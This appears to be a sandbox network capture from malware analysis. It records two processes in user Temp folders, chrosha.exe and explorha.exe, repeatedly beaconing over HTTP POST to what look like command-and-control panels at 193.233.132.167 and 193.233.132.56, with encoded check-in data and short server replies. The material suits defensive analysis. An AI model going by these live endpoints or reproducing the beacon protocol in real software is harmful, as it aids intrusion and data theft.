                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:32:19.791121006 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:19 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
511 | 192.168.2.5 | 50355 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:32:19.907042027 CEST | 309 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Apr 19, 2024 03:32:20.157968044 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:20 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
512 | 192.168.2.5 | 50356 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:32:20.041852951 CEST | 312 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Apr 19, 2024 03:32:20.289483070 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:20 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
513 | 192.168.2.5 | 50357 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:32:20.530364037 CEST | 155 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:32:20.782867908 CEST | 197 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:20 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
514 | 192.168.2.5 | 50358 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:32:20.648312092 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:32:20.892092943 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:20 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
515 | 192.168.2.5 | 50359 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:32:21.036916971 CEST | 309 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Apr 19, 2024 03:32:21.289412022 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:21 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
516 | 192.168.2.5 | 50360 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:32:21.142071009 CEST | 312 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Apr 19, 2024 03:32:21.390985012 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:21 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
517 | 192.168.2.5 | 50361 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:32:21.657546043 CEST | 155 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:32:21.905548096 CEST | 197 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:21 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
518 | 192.168.2.5 | 50362 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:32:21.740859032 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:32:21.984735012 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:21 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
519 | 192.168.2.5 | 50364 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:32:22.159617901 CEST | 309 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Timestamp: Apr 19, 2024 03:32:22.412725925 CEST, Bytes transferred: 196, Direction: IN, Data:
HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:22 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID: 520, Source IP: 192.168.2.5, Source Port: 50365, Destination IP: 193.233.132.56, Destination Port: 80, PID: 4484, Process: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp: Apr 19, 2024 03:32:22.239408016 CEST, Bytes transferred: 312, Direction: OUT, Data:
POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Timestamp: Apr 19, 2024 03:32:22.492142916 CEST, Bytes transferred: 196, Direction: IN, Data:
HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:22 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID: 521, Source IP: 192.168.2.5, Source Port: 50366, Destination IP: 193.233.132.167, Destination Port: 80, PID: 8024, Process: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp: Apr 19, 2024 03:32:22.776021957 CEST, Bytes transferred: 155, Direction: OUT, Data:
POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Timestamp: Apr 19, 2024 03:32:23.024703979 CEST, Bytes transferred: 197, Direction: IN, Data:
HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:22 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


Session ID: 522, Source IP: 192.168.2.5, Source Port: 50367, Destination IP: 193.233.132.56, Destination Port: 80, PID: 4484, Process: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp: Apr 19, 2024 03:32:22.858995914 CEST, Bytes transferred: 158, Direction: OUT, Data:
POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Timestamp: Apr 19, 2024 03:32:23.107474089 CEST, Bytes transferred: 219, Direction: IN, Data:
HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:22 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


Session ID: 523, Source IP: 192.168.2.5, Source Port: 50368, Destination IP: 193.233.132.167, Destination Port: 80, PID: 8024, Process: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp: Apr 19, 2024 03:32:23.276231050 CEST, Bytes transferred: 309, Direction: OUT, Data:
POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Timestamp: Apr 19, 2024 03:32:23.528750896 CEST, Bytes transferred: 196, Direction: IN, Data:
HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:23 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID: 524, Source IP: 192.168.2.5, Source Port: 50369, Destination IP: 193.233.132.56, Destination Port: 80, PID: 4484, Process: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp: Apr 19, 2024 03:32:23.361321926 CEST, Bytes transferred: 312, Direction: OUT, Data:
POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Timestamp: Apr 19, 2024 03:32:23.614545107 CEST, Bytes transferred: 196, Direction: IN, Data:
HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:23 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID: 525, Source IP: 192.168.2.5, Source Port: 50370, Destination IP: 193.233.132.167, Destination Port: 80, PID: 8024, Process: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp: Apr 19, 2024 03:32:23.883049965 CEST, Bytes transferred: 155, Direction: OUT, Data:
POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:24.126471996 CEST | 197 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:24 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                                                                                      526 | 192.168.2.5 | 50371 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:23.973814964 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:24.215981007 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:24 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                                                                                      527 | 192.168.2.5 | 50372 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:24.372375011 CEST | 309 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
